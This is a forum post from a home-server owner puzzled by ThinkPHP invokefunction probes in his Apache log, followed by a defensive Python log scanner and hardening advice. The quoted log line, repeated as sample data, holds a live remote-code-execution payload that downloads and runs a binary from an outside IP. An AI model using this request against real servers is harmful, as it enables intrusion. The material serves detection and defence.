Hello all.
I have a “little home server” in my home (call me crazy). It’s a LAMP with Slackware 14.1, and I serve my blog from it. I know, I need to upgrade, but I have no time.
I have several doubts (I am thinking now that, if necessary, I can open one thread for each of them).
First, a little view of my server:
Code:
$ uname -a && cat /etc/slackware-version
Linux Sherwood 3.10.17 #2 SMP Wed Oct 23 16:34:38 CDT 2013 x86_64 Intel(R) Xeon(TM) CPU 3.20GHz GenuineIntel GNU/Linux
Slackware 14.1
# httpd -v
Server version: Apache/2.4.6 (Unix)
Server built: Aug 5 2013 16:32:54
# php -v
PHP 5.4.20 (cli) (built: Oct 11 2013 17:50:38)
Copyright (c) 1997-2013 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2013 Zend Technologies
# mysql --version
mysql Ver 15.1 Distrib 5.5.32-MariaDB, for Linux (x86_64) using readline 5.1
My first doubt:
The server was off for over a year, because of problems with my ISP (I live in a little village in the North of Spain, in the mountains, and here we can only hire ADSL from one ISP, no rivalry; the prices are excessively expensive and the services provided are minimal, so I declined the contract). I renewed it recently, and the server is “on the air” again.
Since I turned it on, I have been seeing lines like this in the Apache log:
Code:
$ cat /var/log/httpd/access_log | grep thinkphp | tail -n 1
140.238.212.252 - - [27/Jan/2020:03:06:16 +0100] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.170.40.61/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 200 44335
Lines like this are now usual in my Apache access_log.
I read some things about the ThinkPHP web attack, and I understand (with my bad English comprehension) that it consists of a remote code execution vulnerability in ThinkPHP, but I am not using the ThinkPHP framework on my server, I think (Slack does not install it either, not even in a full install, and I didn’t install it):
Code:
$ php -i | grep think
alfonso@Sherwood:~$
But I can see the 200 response in my access_log, and in those lines I read things like:
Code:
wget -O you.are.a.bastard
chmod 777 you.are.a.bastard
./you.bastard.are.executing.code.in.my.machine
rm -rf bastard
I am sure they are playing with my server in a bad way. Are they really doing it? Are they executing code here in the mountains? Because I have not installed ThinkPHP… We have only trees, wolves here, and a bad sysadmin (edit: we have a forest guard fighting with LAMP, and he usually loses the battle; he is only a luser).
I have read too (important, I know) that this vulnerability is patched (the affected versions are ThinkPHP 5.0 and 5.1), but I have not installed it, nor any other version…
So, what is happening? How can I defend my machine from this?
I tried to edit my .htaccess file (I did it a lot of times, I can’t remember them all, much less transcribe those attempts here) in order to filter the “thinkphp” match, and I tried searching how to do it with Apache too, but my attempts are being unsuccessful (a bad sysadmin, remember).
What can I do?
I think perhaps you need more information about my system, like the outputs of httpd -L, php -option, or whatever else… But those outputs are large, and you can help me with grep or similar to search for the relevant info.
Note that I need a temporary solution, because I know I must upgrade the system, Apache, PHP, etc. I need to implement SSL and HTTPS too (I read a good manual from AlienBob, great!)… And I have a lot less time than I would like, and I’m sure I’ll crash something during the process (it is possible that the best way to do it all is to reinstall and reconfigure everything, but I’ll try to upgrade and learn a lot during the process first), so I think all these tasks are going to extend over time.
My second doubt:
My domain has been blacklisted in SORBS DUHL and in Spamhaus ZEN. Is it possible that there is a relation between the blacklist and my vulnerability?
Thank you very much, and sorry for my bad English.
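The log line quoted in the post is the standard ThinkPHP 5.x "invokefunction" probe: the `s=` route parameter asks ThinkPHP's router to call `call_user_func_array`, `vars[0]` is the PHP function to invoke (`shell_exec`) and `vars[1][]` is its argument (the wget/chmod/run/delete one-liner). On a server that is not running ThinkPHP, `index.php` simply ignores an `s=` parameter it does not know, so a 200 with the same byte count as a normal front-page hit is what you would expect to see whether or not the attack did anything. The script below is an added example written for this post, not code from the thread or from any project; it parses the access_log, decodes what each probe asked PHP to run, extracts the payload URL and the filename the payload tries to drop, and flags probes whose response matches the size of a plain `GET /index.php`. The `SAMPLE_LOG` is constructed: its first line repeats the poster's own entry, the others are made-up traffic from documentation IP ranges; the DocumentRoot `/srv/httpd/htdocs` is an assumption about a default Slackware httpd.conf.

```python
"""Scan an Apache access_log for ThinkPHP "invokefunction" probes.

Added example for the forum post above; not part of the original thread.
SAMPLE_LOG is constructed test data (first line copied from the post,
the rest invented); the docroot path in __main__ is an assumption.
"""
import os
import re
from urllib.parse import unquote_plus

# Apache combined/common log format, up to the byte count.
# The request target is matched lazily because these probes contain
# literal spaces inside the query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) HTTP/\d\.\d" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)
# Markers of the ThinkPHP 5.x invokefunction RCE probe. The route in the
# request is literally \think\app (two backslashes), often URL-encoded.
MARKERS = ("invokefunction", "\\think\\app", "call_user_func_array")
URL_RE = re.compile(r"https?://[^\s'\"]+")
WGET_OUT_RE = re.compile(r"-O\s+(\S+)")

SAMPLE_LOG = r"""
140.238.212.252 - - [27/Jan/2020:03:06:16 +0100] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.170.40.61/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 200 44335
198.51.100.7 - - [27/Jan/2020:03:07:02 +0100] "GET /index.php HTTP/1.1" 200 44335
198.51.100.7 - - [27/Jan/2020:03:07:03 +0100] "GET /wp-content/themes/x/style.css HTTP/1.1" 200 1928
203.0.113.9 - - [27/Jan/2020:04:12:44 +0100] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 200 44335
"""


def parse_line(line):
    """Return a dict for one access_log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    path, _, query = entry["target"].partition("?")
    entry["path"] = path
    # Decode the way PHP builds $_GET: split on '&', URL-decode key and value.
    entry["params"] = {}
    for part in query.split("&"):
        key, _, value = part.partition("=")
        if key:
            entry["params"][unquote_plus(key)] = unquote_plus(value)
    return entry


def is_thinkphp_probe(entry):
    """True if the URL-decoded request carries any of the probe markers."""
    decoded = unquote_plus(entry["target"]).lower()
    return any(marker in decoded for marker in MARKERS)


def analyse(log_text):
    """Return one record per ThinkPHP probe found in log_text."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    # Byte counts of the normal front page: plain hits with no query string.
    front_page_sizes = {
        e["bytes"] for e in entries
        if e["path"] in ("/", "/index.php") and not e["params"]
    }
    probes = []
    for e in entries:
        if not is_thinkphp_probe(e):
            continue
        func = e["params"].get("vars[0]", "")            # PHP function requested
        arg = e["params"].get("vars[1][]", "").strip("'\"")  # its argument
        probes.append({
            "ip": e["ip"],
            "time": e["time"],
            "function": func,
            "argument": arg,
            "payload_urls": URL_RE.findall(arg),
            "dropped_files": WGET_OUT_RE.findall(arg),
            "status": e["status"],
            "bytes": e["bytes"],
            # 200 with the front page's byte count: index.php ignored s=
            # and served the blog as usual, which is not evidence of execution.
            "served_front_page": e["status"] == "200" and e["bytes"] in front_page_sizes,
        })
    return probes


def find_dropped_files(docroot, probes):
    """Paths under docroot that match filenames the payloads try to write."""
    names = {name for p in probes for name in p["dropped_files"]}
    candidates = (os.path.join(docroot, n) for n in sorted(names))
    return [c for c in candidates if os.path.exists(c)]


if __name__ == "__main__":
    found = analyse(SAMPLE_LOG)
    for p in found:
        print(f'{p["time"]} {p["ip"]} {p["function"]}({p["argument"]!r}) '
              f'-> {p["status"]} {p["bytes"]} bytes, front page: {p["served_front_page"]}')
    # Assumed Slackware DocumentRoot; take it from your httpd.conf.
    print("dropped files present:", find_dropped_files("/srv/httpd/htdocs", found))
```

Run it against the real log with `analyse(open("/var/log/httpd/access_log").read())` and pass your actual DocumentRoot to `find_dropped_files`; an empty list there, together with `served_front_page` being true for every probe and no unknown process in `ps aux`, is the evidence that the requests were answered by your own `index.php` rather than by ThinkPHP. Blocking the noise is separate from that question: on Apache 2.4 a core `<If>` container works without mod_rewrite, in httpd.conf or in .htaccess when AllowOverride permits it, for example `<If "%{QUERY_STRING} =~ /invokefunction/i">` followed by `Require all denied` and `</If>`, which turns these probes into 403s. That only hides them from the log; the upgrade the post already plans, plus `disable_functions` for `shell_exec`, `exec`, `system` and `passthru` in php.ini if the blog does not need them, is what limits the damage from the next scanner that does find something installed.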